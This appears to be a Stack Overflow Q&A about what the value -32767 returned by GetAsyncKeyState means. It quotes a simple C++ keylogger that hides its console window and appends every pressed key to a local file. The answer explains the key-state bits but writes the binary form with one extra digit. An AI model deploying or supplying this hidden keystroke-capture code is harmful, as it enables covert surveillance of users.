# What does the number mean in "GetAsyncKeyState(c) == -32767"?

Tags: c++

I have one question about this simple keylogger in C++.

What is the function of this `if` condition?

`GetAsyncKeyState(c) == -32767`

What does this number mean?

```
int main()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY = 'x';

    while (true) {
        Sleep(10);
        for (int KEY = 8; KEY <= 190; KEY++)
        {
            if (GetAsyncKeyState(KEY) == -32767) {
                if (SpecialKeys(KEY) == false) {

                    fstream LogFile;
                    LogFile.open("dat.txt", fstream::app);
                    if (LogFile.is_open()) {
                        LogFile << char(KEY);
                        LogFile.close();
                    }

                }
            }
        }
    }

    return 0;
}
```

Comment: According to the [documentation](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate), that number has no defined meaning. You should follow the official documentation, not the code above. I guess a better way to write the code would be `if (GetAsyncKeyState(KEY) < 0) {`

Answer (score 1):

`-32767` in decimal is bits `10000000000000001` in binary. Per the `GetAsyncKeyState()` [documentation](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate):

> Return value
>
> Type: SHORT
>
> If the function succeeds, the return value specifies whether the key was pressed since the last call to GetAsyncKeyState, and whether the key is currently up or down. **If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous call to GetAsyncKeyState**.

So, the code is looping through all of the virtual keys between 8..190, looking for only the keys whose state contains both bits set.  Though, the documentation goes into further detail explaining why the least significant bit can't be relied on. As such, the `if` statement would be better written as either:

`if (GetAsyncKeyState(KEY) & 0x8000)`

Or

`if (GetAsyncKeyState(KEY) < 0)`

Both of which check for only the most significant bit being set.